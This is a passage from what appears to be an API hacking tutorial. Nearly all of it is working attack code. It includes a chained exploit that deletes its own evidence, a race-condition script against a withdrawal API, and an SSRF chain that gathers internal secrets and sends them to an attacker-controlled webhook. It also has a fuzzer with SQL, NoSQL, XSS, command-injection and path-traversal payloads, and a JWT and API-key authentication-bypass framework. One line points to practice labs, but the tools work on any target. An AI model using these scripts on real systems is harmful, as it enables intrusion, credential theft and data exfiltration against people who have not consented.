    });
    
    if (!exploitResponse.ok) {
      throw new Error(`Exploitation failed: ${exploitResponse.status}`);
    }
    
    const result = await exploitResponse.json();
    console.log("Exploitation successful!");
    console.log(result);
    
    // Step 4: Clean up evidence (optional)
    console.log("Step 4: Cleaning up...");
    await fetch(`${baseUrl}/api/items/${item.id}`, {
      method: 'DELETE',
      headers: {
        'Authorization': `Bearer ${authToken}`
      }
    });
    
    console.log("Cleanup complete");
    
    return result;
  } catch (error) {
    console.error("Error during exploitation chain:", error);
    throw error;
  }
}

2. Race Conditions in APIs

# Python script to exploit API race conditions
import requests
import threading
import time
import concurrent.futures

def exploit_race_condition(url, auth_token, payload, num_threads=20):
    """
    Attempt to exploit race conditions in an API endpoint
    by sending multiple concurrent requests
    """
    # Setup headers
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/json'
    }
    
    # Track successful responses
    successful_responses = []
    response_lock = threading.Lock()
    
    # Function to be executed by each thread
    def make_request():
        try:
            response = requests.post(url, json=payload, headers=headers)
            
            # Store response if successful
            if response.status_code == 200:
                with response_lock:
                    successful_responses.append(response.json())
                    
            return {
                'status_code': response.status_code,
                'response': response.text
            }
        except Exception as e:
            return {'error': str(e)}
    
    # Prepare threads
    print(f"Launching {num_threads} concurrent requests...")
    start_time = time.time()
    
    # Use ThreadPoolExecutor for better management
    with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
        # Submit all requests simultaneously
        futures = [executor.submit(make_request) for _ in range(num_threads)]
        
        # Wait for all to complete
        concurrent.futures.wait(futures)
    
    end_time = time.time()
    
    # Analyze results
    results = [future.result() for future in futures]
    success_count = sum(1 for r in results if r.get('status_code') == 200)
    
    print(f"Race condition test completed in {end_time - start_time:.2f} seconds")
    print(f"Successful requests: {success_count}/{num_threads}")
    
    if len(successful_responses) > 1:
        print("Potential race condition detected!")
        print(f"Got {len(successful_responses)} successful responses")
    else:
        print("No race condition detected")
        
    return {
        'successful_responses': successful_responses,
        'all_results': results
    }

# Example usage
url = "https://api.example.com/withdraw"
auth_token = "valid_user_token"
payload = {
    "amount": 100,
    "account_id": "12345",
    "destination": "54321"
}

# Try to exploit a potential race condition in a withdrawal API
exploit_race_condition(url, auth_token, payload, num_threads=50)

API Vulnerability Chaining

1. From SSRF to Data Exfiltration

# Python script demonstrating API vulnerability chaining
# Chain: SSRF → Internal API Access → Data Exfiltration
import requests
import json
import base64

def chain_ssrf_to_exfiltration(target_url, webhook_url):
    """
    Chain multiple vulnerabilities:
    1. Use SSRF to access internal API
    2. Retrieve sensitive data
    3. Exfiltrate data to external server
    """
    print(f"Starting exploitation chain against {target_url}")
    
    # Step 1: Probe for SSRF vulnerability
    print("\n[Step 1] Testing for SSRF vulnerability...")
    
    # Try different SSRF payloads
    ssrf_payloads = [
        f"http://localhost:8080/api/internal/users",
        f"http://127.0.0.1:8080/api/internal/users",
        f"http://0.0.0.0:8080/api/internal/users",
        f"http://internal-api/users",
        f"http://10.0.0.1/api/users"
    ]
    
    ssrf_response = None
    successful_payload = None
    
    for payload in ssrf_payloads:
        try:
            print(f"Trying SSRF payload: {payload}")
            
            # Assuming there's an endpoint that fetches external resources
            response = requests.post(
                f"{target_url}/api/fetch_resource",
                json={"url": payload},
                timeout=5
            )
            
            # Check if we got a successful response with data
            if response.status_code == 200 and "user" in response.text.lower():
                print(f"SSRF vulnerability confirmed with payload: {payload}")
                ssrf_response = response.json()
                successful_payload = payload
                break
                
        except Exception as e:
            print(f"Error with payload {payload}: {e}")
    
    if not ssrf_response:
        print("Failed to exploit SSRF vulnerability")
        return False
    
    # Step 2: Enumerate internal API using SSRF
    print("\n[Step 2] Enumerating internal API...")
    
    # Extract base internal URL from successful payload
    internal_base_url = successful_payload.rsplit('/api/', 1)[0]
    
    # Potential internal endpoints to probe
    internal_endpoints = [
        "/api/internal/users",
        "/api/internal/config",
        "/api/internal/keys",
        "/api/internal/secrets",
        "/api/system/info",
        "/api/admin/users",
        "/api/v1/internal/database",
        "/health",
        "/metrics",
        "/actuator/env",
        "/actuator/health"
    ]
    
    internal_data = {}
    
    for endpoint in internal_endpoints:
        try:
            internal_url = f"{internal_base_url}{endpoint}"
            print(f"Probing internal endpoint: {internal_url}")
            
            response = requests.post(
                f"{target_url}/api/fetch_resource",
                json={"url": internal_url},
                timeout=5
            )
            
            # Store responses that look promising
            if response.status_code == 200:
                try:
                    data = response.json()
                    internal_data[endpoint] = data
                    print(f"Successfully accessed internal endpoint: {endpoint}")
                except:
                    print(f"Got response but not valid JSON from: {endpoint}")
        except Exception as e:
            print(f"Error accessing {endpoint}: {e}")
    
    if not internal_data:
        print("Failed to gather internal API data")
        return False
    
    # Step 3: Extract sensitive information
    print("\n[Step 3] Extracting sensitive information...")
    
    # Look for sensitive data patterns in the responses
    sensitive_data = {}
    
    patterns = [
        "api_key", "key", "secret", "password", "token", "credential",
        "admin", "user", "database", "connection", "config"
    ]
    
    def search_for_sensitive_data(data, path=""):
        if isinstance(data, dict):
            for key, value in data.items():
                new_path = f"{path}.{key}" if path else key
                # Check if the key matches sensitive patterns
                if any(pattern in key.lower() for pattern in patterns):
                    sensitive_data[new_path] = value
                
                search_for_sensitive_data(value, new_path)
        elif isinstance(data, list):
            for i, item in enumerate(data):
                new_path = f"{path}[{i}]"
                search_for_sensitive_data(item, new_path)
    
    # Process all gathered data
    for endpoint, data in internal_data.items():
        search_for_sensitive_data(data, endpoint)
    
    if not sensitive_data:
        print("No obviously sensitive data found")
    else:
        print(f"Found {len(sensitive_data)} potentially sensitive data items")
        
    # Step 4: Exfiltrate the data
    print("\n[Step 4] Exfiltrating data...")
    
    # Combine all gathered data
    exfil_data = {
        "ssrf_response": ssrf_response,
        "internal_api_data": internal_data,
        "sensitive_data": sensitive_data
    }
    
    # Encode the data to avoid potential issues
    encoded_data = base64.b64encode(json.dumps(exfil_data).encode()).decode()
    
    try:
        # Send data to attacker-controlled webhook
        exfil_response = requests.post(
            webhook_url,
            json={"data": encoded_data}
        )
        
        if exfil_response.status_code == 200:
            print(f"Successfully exfiltrated data to {webhook_url}")
            return True
        else:
            print(f"Failed to exfiltrate data: {exfil_response.status_code}")
            return False
            
    except Exception as e:
        print(f"Error during data exfiltration: {e}")
        return False

# Example usage
target_url = "https://vulnerable-api.example.com"
webhook_url = "https://attacker-controlled-server.com/webhook"

chain_ssrf_to_exfiltration(target_url, webhook_url)

Hands-On Challenge #3: Advanced API Attack Chain

Try This: In a controlled environment with vulnerable applications like DVWA, WebGoat, or Juice Shop:

  1. Identify and chain together at least three API vulnerabilities (e.g., authentication bypass → IDOR → data extraction)
  2. Document your methodology
  3. Implement a basic script to automate the attack chain

Expert Level: Custom Tooling and Zero-Days

At the expert level, we focus on developing custom tools, discovering new vulnerabilities, and building comprehensive testing frameworks.

Building an API Fuzzing Framework

# API Fuzzing Framework for Discovering Zero-Days
import argparse
import random
import string
import json
import time
import sys
import re
import requests
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor

class APIFuzzer:
    def __init__(self, base_url, auth_token=None, threads=10, delay=0.1, timeout=10, output_file=None, verbose=False):
        self.base_url = base_url.rstrip('/')
        self.auth_token = auth_token
        self.threads = threads
        self.delay = delay
        self.timeout = timeout
        self.output_file = output_file or f"api_fuzzing_results_{int(time.time())}.json"
        self.verbose = verbose
        self.session = requests.Session()
        self.results = []
        self.endpoints_discovered = set()
        self.parameters_discovered = {}
        self.vulnerabilities_found = []
        
        # Initialize headers
        self.headers = {}
        if auth_token:
            self.headers['Authorization'] = f"Bearer {auth_token}"
        
        # Payload libraries
        self.sqli_payloads = [
            "' OR 1=1--",
            "' UNION SELECT 1,2,3--",
            "' WAITFOR DELAY '0:0:1'--",
            "1; DROP TABLE users--",
            "' OR '1'='1",
            "1' ORDER BY 10--",
            "admin'--"
        ]
        
        self.nosqli_payloads = [
            '{"$gt": ""}',
            '{"$ne": null}',
            '{"$regex": "^admin"}',
            '{"$exists": true}',
            '{"$where": "this.password.length > 0"}',
            '{"$gt": 0}'
        ]
        
        self.xss_payloads = [
            "<script>alert(1)</script>",
            "<img src=x onerror=alert(1)>",
            "javascript:alert(1)",
            '"><script>alert(1)</script>',
            "';alert(1);//",
            "<svg onload=alert(1)>",
            "\"><img src=x onerror=alert(1)>"
        ]
        
        self.command_injection_payloads = [
            "; ls -la",
            "& whoami",
            "| cat /etc/passwd",
            "; sleep 5",
            "` ping -c 3 127.0.0.1 `",
            "$(cat /etc/passwd)",
            "'; ping -c 3 127.0.0.1 #"
        ]
        
        self.path_traversal_payloads = [
            "../../../etc/passwd",
            "..%2f..%2f..%2fetc%2fpasswd",
            "....//....//....//etc//passwd",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
            "..\\..\\..\\windows\\win.ini",
            "file:///etc/passwd",
            "/var/www/html/index.php"
        ]
        
        # HTTP methods to test
        self.http_methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD"]
        
    def log(self, message, level="INFO"):
        """Log messages if verbose mode is enabled"""
        if self.verbose or level == "ERROR" or level == "CRITICAL":
            timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            print(f"[{timestamp}] [{level}] {message}")
            
    def generate_random_string(self, length=10):
        """Generate a random string for testing"""
        return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
        
    def generate_random_number(self, min_val=1, max_val=1000):
        """Generate a random number for testing"""
        return random.randint(min_val, max_val)
        
    def generate_random_json(self, fields=None):
        """Generate random JSON data"""
        if not fields:
            fields = ['name', 'id', 'description', 'value', 'enabled']
            
        data = {}
        for field in fields:
            # 50% chance of being a string, 30% number, 20% boolean
            rand_type = random.random()
            if rand_type < 0.5:
                data[field] = self.generate_random_string()
            elif rand_type < 0.8:
                data[field] = self.generate_random_number()
            else:
                data[field] = random.choice([True, False])
                
        return data
        
    def discover_endpoints(self, wordlist=None):
        """Discover API endpoints using a wordlist"""
        self.log("Starting endpoint discovery...")
        
        # Default mini wordlist if none provided
        if not wordlist:
            wordlist = [
                'users', 'admin', 'products', 'orders', 'items', 'customers',
                'login', 'logout', 'register', 'auth', 'token', 'api', 'v1', 'v2',
                'data', 'info', 'profile', 'settings', 'config', 'system', 'health',
                'status', 'metrics', 'stats', 'reports', 'dashboard', 'uploads',
                'files', 'images', 'documents', 'payments', 'billing', 'subscriptions',
                'comments', 'reviews', 'ratings', 'favorites', 'cart', 'checkout',
                'search', 'query', 'filter', 'sort', 'page', 'limit', 'internal'
            ]
        
        # Add common API path components
        api_prefixes = ['api', 'apis', 'api/v1', 'api/v2', 'api/v3', 'v1', 'v2', 'rest', 'graphql', 'service']
        
        # Generate extended paths
        paths_to_check = []
        
        # Add base wordlist items
        paths_to_check.extend(wordlist)
        
        # Add items with API prefixes
        for prefix in api_prefixes:
            for word in wordlist:
                paths_to_check.append(f"{prefix}/{word}")
                
        # Add common nested paths
        for word1 in wordlist[:20]:  # Limit to avoid too many combinations
            for word2 in wordlist[:20]:
                paths_to_check.append(f"{word1}/{word2}")
                
        # Add some common IDs to resources
        for word in wordlist[:10]:
            paths_to_check.append(f"{word}/1")
            paths_to_check.append(f"{word}/admin")
            paths_to_check.append(f"{word}/test")
            
        self.log(f"Generated {len(paths_to_check)} paths to check")
        
        # Use ThreadPoolExecutor to parallelize requests
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            executor.map(self.check_endpoint, paths_to_check)
            
        self.log(f"Endpoint discovery complete. Found {len(self.endpoints_discovered)} endpoints")
        return self.endpoints_discovered
        
    def check_endpoint(self, path):
        """Check if an endpoint exists"""
        url = f"{self.base_url}/{path}"
        
        for method in ["GET", "POST", "HEAD"]:  # Limit to common methods for discovery
            try:
                # Make request with appropriate method
                if method == "GET" or method == "HEAD":
                    response = self.session.request(
                        method, 
                        url, 
                        headers=self.headers, 
                        timeout=self.timeout
                    )
                else:
                    # For POST, send minimal JSON data
                    response = self.session.request(
                        method, 
                        url, 
                        headers={**self.headers, 'Content-Type': 'application/json'}, 
                        json={},
                        timeout=self.timeout
                    )
                
                # Check for "successful" responses (including 400's which indicate the endpoint exists but needs correct params)
                if response.status_code < 500:
                    self.endpoints_discovered.add(path)
                    self.log(f"Discovered endpoint: {method} {path} (Status: {response.status_code})")
                    
                    # Try to determine parameters from response
                    self.analyze_response_for_parameters(path, response)
                    
                # Small delay to be polite
                time.sleep(self.delay)
                
            except Exception as e:
                if self.verbose:
                    self.log(f"Error checking {method} {path}: {str(e)}", "ERROR")
                    
    def analyze_response_for_parameters(self, path, response):
        """Analyze response to discover potential parameters"""
        try:
            # Check if response is JSON
            if 'application/json' in response.headers.get('Content-Type', ''):
                data = response.json()
                
                # Extract potential parameters from response
                if isinstance(data, dict):
                    # Add discovered parameters to our dictionary
                    self.parameters_discovered[path] = list(data.keys())
                    
                # Look for arrays of objects which may indicate resource structure
                elif isinstance(data, list) and data and isinstance(data[0], dict):
                    self.parameters_discovered[path] = list(data[0].keys())
                    
        except Exception:
            # Not JSON or couldn't parse, check for error messages that might reveal parameters
            if 'parameter' in response.text.lower() or 'field' in response.text.lower():
                # Simple regex to find parameter names in error messages
                param_matches = re.findall(r'parameter [\'"]([A-Za-z0-9_]+)[\'"]', response.text)
                param_matches += re.findall(r'field [\'"]([A-Za-z0-9_]+)[\'"]', response.text)
                
                if param_matches:
                    self.parameters_discovered[path] = param_matches
                
    def fuzz_endpoint(self, path, methods=None, parameters=None):
        """Fuzz a specific endpoint with payloads"""
        if not methods:
            methods = self.http_methods
            
        if not parameters:
            # Use discovered parameters or some defaults
            parameters = self.parameters_discovered.get(path, ['id', 'name', 'user_id', 'query', 'search', 'filter', 'sort', 'page', 'limit'])
            
        self.log(f"Fuzzing endpoint: {path} with methods {methods} and parameters {parameters}")
        
        # Prepare payload categories with vulnerability types
        payload_categories = [
            {"name": "SQL Injection", "payloads": self.sqli_payloads},
            {"name": "NoSQL Injection", "payloads": self.nosqli_payloads},
            {"name": "XSS", "payloads": self.xss_payloads},
            {"name": "Command Injection", "payloads": self.command_injection_payloads},
            {"name": "Path Traversal", "payloads": self.path_traversal_payloads}
        ]
        
        # Test each method
        for method in methods:
            # For each parameter
            for param in parameters:
                # Test with random valid data first (baseline)
                baseline_response = self.test_parameter(path, method, param, self.generate_random_string())
                
                if not baseline_response:
                    continue
                    
                # Now test with each payload category
                for category in payload_categories:
                    for payload in category["payloads"]:
                        vulnerability = self.test_parameter(
                            path, 
                            method, 
                            param, 
                            payload,
                            vulnerability_type=category["name"],
                            baseline=baseline_response
                        )
                        
                        if vulnerability:
                            self.log(f"Potential {category['name']} vulnerability found in {method} {path}, parameter {param}", "CRITICAL")
                            self.vulnerabilities_found.append(vulnerability)
                
                # Small delay to be polite
                time.sleep(self.delay)
                
    def test_parameter(self, path, method, param, value, vulnerability_type=None, baseline=None):
        """Test a specific parameter with a value"""
        url = f"{self.base_url}/{path}"
        
        try:
            # Prepare data based on the method
            if method in ["GET", "DELETE", "HEAD"]:
                kwargs = {"params": {param: value}}
            else:
                # For POST, PUT, PATCH
                kwargs = {"json": {param: value}}
                
            # Add headers
            kwargs["headers"] = self.headers.copy()
            if method in ["POST", "PUT", "PATCH"]:
                kwargs["headers"]["Content-Type"] = "application/json"
                
            # Send the request
            response = self.session.request(method, url, **kwargs, timeout=self.timeout)
            
            # Record the result
            result = {
                "path": path,
                "method": method,
                "parameter": param,
                "value": value,
                "status_code": response.status_code,
                "response_time": response.elapsed.total_seconds(),
                "response_length": len(response.text),
                "timestamp": datetime.now().isoformat()
            }
            
            # Determine if this might be a vulnerability
            vulnerability = None
            if vulnerability_type and baseline:
                # Look for indicators of vulnerability based on type
                if self.detect_vulnerability(vulnerability_type, response, baseline, value):
                    vulnerability = {
                        **result,
                        "vulnerability_type": vulnerability_type,
                        "confidence": "medium",  # Initial confidence level
                        "baseline_status": baseline.get("status_code"),
                        "baseline_length": baseline.get("response_length")
                    }
                    
            # Add to results
            self.results.append(result)
            return vulnerability or result
            
        except Exception as e:
            self.log(f"Error testing {method} {path} parameter {param}: {str(e)}", "ERROR")
            return None
            
    def detect_vulnerability(self, vuln_type, response, baseline, payload):
        """Detect if a response indicates a potential vulnerability"""
        # Compare with baseline response
        baseline_status = baseline.get("status_code")
        baseline_length = baseline.get("response_length", 0)
        response_length = len(response.text)
        
        # Check for significant response differences
        status_changed = response.status_code != baseline_status
        length_diff = abs(response_length - baseline_length)
        length_percentage = (length_diff / baseline_length * 100) if baseline_length > 0 else 0
        
        # Look for specific vulnerability indicators
        indicators = {
            "SQL Injection": [
                # Error messages
                "sql syntax", "mysql error", "postgresql error", "sqlite error", "ora-", "sql server",
                # Data leakage 
                "query failed", "syntax error", "unclosed quotation mark", "unterminated string",
                # Successful exploitation signs (data differences)
                # Status code differences
                length_percentage > 30 and status_changed
            ],
            
            "NoSQL Injection": [
                # Error messages
                "mongodb", "bson", "mongo", "mongoose", 
                # Data leakage
                "database error", "cursor", "$where", "$ne", 
                # Status or data differences
                length_percentage > 25 or status_changed
            ],
            
            "XSS": [
                # Response reflecting the payload
                payload in response.text,
                # Minimal encoding
                payload.replace("<", "&lt;").replace(">", "&gt;") in response.text,
                # Script execution indicators
                "<script>" in response.text and payload in response.text
            ],
            
            "Command Injection": [
                # Output of commands in response
                "root:" in response.text and "/bin/" in response.text,  # passwd file
                "Directory of" in response.text and "Volume" in response.text,  # Windows dir
                "uid=" in response.text and "gid=" in response.text,  # whoami
                # Timing indicators
                response.elapsed.total_seconds() > baseline.get("response_time", 0) + 1 and "sleep" in payload
            ],
            
            "Path Traversal": [
                # File contents in response
                "root:" in response.text and ":/bin/" in response.text,  # passwd file
                "[boot loader]" in response.text,  # win.ini
                "# php configuration" in response.text.lower(),  # php.ini
                # Directory listing
                "<dir>" in response.text.lower() and "directory" in response.text.lower(),
                # Status or length changes indicating success
                (status_changed and length_percentage > 50) or (response.status_code == 200 and baseline_status != 200)
            ]
        }
        
        # Check for indicators specific to this vulnerability type
        vuln_indicators = indicators.get(vuln_type, [])
        
        for indicator in vuln_indicators:
            if isinstance(indicator, bool) and indicator:
                return True
            elif isinstance(indicator, str) and indicator.lower() in response.text.lower():
                return True
                
        return False
    
    def run_full_scan(self):
        """Run a complete scan process"""
        self.log("Starting API security scan")
        
        # 1. Discover endpoints
        self.discover_endpoints()
        
        # 2. Fuzz discovered endpoints
        for endpoint in self.endpoints_discovered:
            self.fuzz_endpoint(endpoint)
            
        # 3. Save results
        self.save_results()
        
        # 4. Print summary
        self.print_summary()
        
    def save_results(self):
        """Save scan results to a file"""
        output = {
            "scan_info": {
                "base_url": self.base_url,
                "timestamp": datetime.now().isoformat(),
                "endpoints_discovered": list(self.endpoints_discovered),
                "parameters_discovered": self.parameters_discovered,
                "vulnerabilities_found": self.vulnerabilities_found,
                "total_requests": len(self.results)
            },
            "detailed_results": self.results
        }
        
        with open(self.output_file, 'w') as f:
            json.dump(output, f, indent=2)
            
        self.log(f"Results saved to {self.output_file}")
        
    def print_summary(self):
        """Print a summary of findings"""
        print("\n" + "="*60)
        print(f"API SECURITY SCAN SUMMARY FOR {self.base_url}")
        print("="*60)
        
        print(f"\nEndpoints Discovered: {len(self.endpoints_discovered)}")
        for endpoint in sorted(self.endpoints_discovered):
            print(f"  - {endpoint}")
            
        print(f"\nPotential Vulnerabilities: {len(self.vulnerabilities_found)}")
        vuln_types = {}
        for vuln in self.vulnerabilities_found:
            vuln_type = vuln.get('vulnerability_type', 'Unknown')
            vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
            
        for vuln_type, count in vuln_types.items():
            print(f"  - {vuln_type}: {count}")
            
        print(f"\nTotal Requests Sent: {len(self.results)}")
        print(f"Full results saved to: {self.output_file}")
        print("="*60 + "\n")

# Main function
def main():
    parser = argparse.ArgumentParser(description="API Security Testing Framework")
    parser.add_argument("url", help="Base URL of the API to test")
    parser.add_argument("-t", "--token", help="Authorization token")
    parser.add_argument("-w", "--wordlist", help="Path to endpoint wordlist file")
    parser.add_argument("-o", "--output", help="Output file for results")
    parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
    parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests in seconds")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
    
    args = parser.parse_args()
    
    # Load wordlist if provided
    wordlist = None
    if args.wordlist:
        try:
            with open(args.wordlist, 'r') as f:
                wordlist = [line.strip() for line in f if line.strip()]
        except Exception as e:
            print(f"Error loading wordlist: {e}")
            sys.exit(1)
    
    # Create and run the fuzzer
    fuzzer = APIFuzzer(
        base_url=args.url,
        auth_token=args.token,
        threads=args.concurrency,
        delay=args.delay,
        output_file=args.output,
        verbose=args.verbose
    )
    
    fuzzer.run_full_scan()
    
if __name__ == "__main__":
    main()

Advanced API Authentication Bypass Framework

# API Authentication Bypass Framework
import jwt
import base64
import json
import hashlib
import hmac
import requests
import argparse
import sys
import time
import random
from concurrent.futures import ThreadPoolExecutor

class APIAuthBypass:
    def __init__(self, target_url, output_file=None, threads=5, verbose=False):
        self.target_url = target_url
        self.output_file = output_file or f"auth_bypass_results_{int(time.time())}.json"
        self.threads = threads
        self.verbose = verbose
        self.session = requests.Session()
        self.results = []
        self.successful_bypasses = []
        
        # Default headers
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }
        
    def log(self, message, level="INFO"):
        """Log messages if verbose mode is enabled"""
        if self.verbose or level == "ERROR" or level == "CRITICAL":
            timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
            print(f"[{timestamp}] [{level}] {message}")
    
    def test_no_auth(self, endpoint):
        """Test if endpoint works without authentication"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing endpoint without auth: {url}")
        
        try:
            response = self.session.get(url, headers=self.headers, timeout=10)
            
            result = {
                "test_type": "no_auth",
                "endpoint": endpoint,
                "status_code": response.status_code,
                "response_length": len(response.text),
                "success": self._is_successful_response(response)
            }
            
            self.results.append(result)
            
            if result["success"]:
                self.log(f"NO AUTH BYPASS: Endpoint {endpoint} accessible without authentication!", "CRITICAL")
                self.successful_bypasses.append(result)
                
            return result
        except Exception as e:
            self.log(f"Error testing no auth on {endpoint}: {str(e)}", "ERROR")
            return None
    
    def test_header_variations(self, endpoint, token=None):
        """Test various header permutations for auth bypass"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing header variations on: {url}")
        
        # Header variations to test
        variations = [
            # Common auth header variations
            {"Authorization": ""},
            {"Auth": "true"},
            {"Authentication": "1"},
            {"X-API-Key": ""},
            {"api-key": ""},
            {"apikey": ""},
            {"x-api-token": ""},
            
            # Case sensitivity tests
            {"AUTHORIZATION": f"Bearer {token}" if token else ""},
            {"authorization": f"bearer {token}" if token else ""},
            
            # Common default/test credentials
            {"Authorization": "Bearer test"},
            {"Authorization": "Bearer admin"},
            {"Authorization": "Bearer 1234567890"},
            {"X-API-Key": "test"},
            {"X-API-Key": "admin"},
            {"X-API-Key": "1234567890"},
            
            # Basic Auth variations
            {"Authorization": "Basic YWRtaW46YWRtaW4="}, # admin:admin
            {"Authorization": "Basic YWRtaW46cGFzc3dvcmQ="}, # admin:password
            {"Authorization": "Basic dGVzdDp0ZXN0"}, # test:test
            {"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}, # guest:guest
            
            # Authorization header removal test
            {}
        ]
        
        for header_variation in variations:
            try:
                # Use custom headers for this request
                test_headers = self.headers.copy()
                
                # Remove any existing auth headers
                auth_headers = ["Authorization", "X-API-Key", "api-key", "apikey", "Auth", "Authentication"]
                for auth_header in auth_headers:
                    if auth_header in test_headers:
                        del test_headers[auth_header]
                        
                # Add the test variation
                test_headers.update(header_variation)
                
                response = self.session.get(url, headers=test_headers, timeout=10)
                
                result = {
                    "test_type": "header_variation",
                    "endpoint": endpoint,
                    "variation": header_variation,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                
                self.results.append(result)
                
                if result["success"]:
                    self.log(f"HEADER BYPASS: Endpoint {endpoint} accessible with header variation: {header_variation}", "CRITICAL")
                    self.successful_bypasses.append(result)
                    
                # Small delay
                time.sleep(0.5)
                
            except Exception as e:
                self.log(f"Error testing header variation {header_variation} on {endpoint}: {str(e)}", "ERROR")
                
    def test_jwt_vulnerabilities(self, endpoint, valid_token=None):
        """Test for JWT-related vulnerabilities"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing JWT vulnerabilities on: {url}")
        
        # If we don't have a valid token, try to create some test tokens
        if not valid_token:
            test_tokens = [
                self._create_test_jwt({"user_id": 1, "role": "admin"}),
                self._create_test_jwt({"user_id": 1, "role": "user"}),
                self._create_test_jwt({"admin": True})
            ]
        else:
            # Parse the provided token to create test variations
            try:
                token_parts = valid_token.split('.')
                if len(token_parts) == 3:
                    payload = json.loads(base64.b64decode(token_parts[1] + "==").decode('utf-8'))
                    
                    # Create variations based on the real token
                    test_tokens = [valid_token]  # Start with the valid token
                    
                    # Try to elevate privileges in the payload
                    modified_payload = payload.copy()
                    
                    # Look for role/permission fields to modify
                    privilege_fields = ['role', 'roles', 'permissions', 'isAdmin', 'is_admin', 'admin', 'scope']
                    
                    for field in privilege_fields:
                        if field in modified_payload:
                            if isinstance(modified_payload[field], str):
                                modified_payload[field] = "admin"
                            elif isinstance(modified_payload[field], list):
                                modified_payload[field].append("admin")
                            elif isinstance(modified_payload[field], bool):
                                modified_payload[field] = True
                    
                    # Add admin if not present
                    if 'role' not in modified_payload:
                        modified_payload['role'] = "admin"
                    if 'admin' not in modified_payload:
                        modified_payload['admin'] = True
                        
                    # Create token with modified payload but same header/signature
                    modified_payload_b64 = base64.b64encode(
                        json.dumps(modified_payload).encode()
                    ).decode().rstrip('=')
                    
                    modified_token = f"{token_parts[0]}.{modified_payload_b64}.{token_parts[2]}"
                    test_tokens.append(modified_token)
                    
                    # Try 'none' algorithm attack
                    none_header = {"alg": "none", "typ": "JWT"}
                    none_header_b64 = base64.b64encode(
                        json.dumps(none_header).encode()
                    ).decode().rstrip('=')
                    
                    none_token = f"{none_header_b64}.{token_parts[1]}."
                    test_tokens.append(none_token)
                    
                    # Same with modified payload
                    none_token_admin = f"{none_header_b64}.{modified_payload_b64}."
                    test_tokens.append(none_token_admin)
                    
                else:
                    # Not a valid JWT, just use our test tokens
                    test_tokens = [
                        self._create_test_jwt({"user_id": 1, "role": "admin"}),
                        self._create_test_jwt({"user_id": 1, "role": "user", "exp": int(time.time()) + 3600}),
                        self._create_test_jwt({"admin": True})
                    ]
            except Exception as e:
                self.log(f"Error parsing valid token: {str(e)}", "ERROR")
                test_tokens = [
                    self._create_test_jwt({"user_id": 1, "role": "admin"}),
                    self._create_test_jwt({"user_id": 1, "role": "user"}),
                    self._create_test_jwt({"admin": True})
                ]
        
        # Test each token
        for token in test_tokens:
            try:
                test_headers = self.headers.copy()
                test_headers["Authorization"] = f"Bearer {token}"
                
                response = self.session.get(url, headers=test_headers, timeout=10)
                
                result = {
                    "test_type": "jwt_vulnerability",
                    "endpoint": endpoint,
                    "token": token,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                
                self.results.append(result)
                
                if result["success"]:
                    self.log(f"JWT BYPASS: Endpoint {endpoint} accessible with modified JWT: {token[:20]}...", "CRITICAL")
                    self.successful_bypasses.append(result)
                    
                # Small delay
                time.sleep(0.5)
                
            except Exception as e:
                self.log(f"Error testing JWT {token[:20]}... on {endpoint}: {str(e)}", "ERROR")
    
    def test_oauth_vulnerabilities(self, endpoint):
        """Test for OAuth-related vulnerabilities"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing OAuth vulnerabilities on: {url}")
        
        # Common OAuth parameters to test
        oauth_params = [
            {"access_token": "EXAMPLE_TOKEN"},
            {"code": "EXAMPLE_CODE"},
            {"id_token": "EXAMPLE_ID_TOKEN"},
            {"token": "EXAMPLE_TOKEN"},
            {"oauth_token": "EXAMPLE_OAUTH_TOKEN"}
        ]
        
        for params in oauth_params:
            try:
                response = self.session.get(url, headers=self.headers, params=params, timeout=10)
                
                result = {
                    "test_type": "oauth_vulnerability",
                    "endpoint": endpoint,
                    "params": params,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                
                self.results.append(result)
                
                if result["success"]:
                    self.log(f"OAUTH BYPASS: Endpoint {endpoint} accessible with OAuth params: {params}", "CRITICAL")
                    self.successful_bypasses.append(result)
                    
                # Small delay
                time.sleep(0.5)
                
            except Exception as e:
                self.log(f"Error testing OAuth params {params} on {endpoint}: {str(e)}", "ERROR")
    
    def test_api_key_bypasses(self, endpoint):
        """Test for API key bypass techniques"""
        url = f"{self.target_url}/{endpoint}"
        self.log(f"Testing API key bypasses on: {url}")
        
        # API key locations to test
        locations = [
            # Headers
            {"type": "header", "name": "X-API-Key", "value": "test_key"},
            {"type": "header", "name": "api-key", "value": "test_key"},
            {"type": "header", "name": "apikey", "value": "test_key"},
            {"type": "header", "name": "x-api-token", "value": "test_key"},
            
            # URL parameters
            {"type": "param", "name": "api_key", "value": "test_key"},
            {"type": "param", "name": "apikey", "value": "test_key"},
            {"type": "param", "name": "key", "value": "test_key"},
            {"type": "param", "name": "api_token", "value": "test_key"},
            
            # Common test values
            {"type": "header", "name": "X-API-Key", "value": "1234567890"},
            {"type": "header", "name": "X-API-Key", "value": "admin"},
            {"type": "header", "name": "X-API-Key", "value": "test"},
            {"type": "param", "name": "api_key", "value": "1234567890"},
            {"type": "param", "name": "api_key", "value": "admin"},
            {"type": "param", "name": "api_key", "value": "test"}
        ]
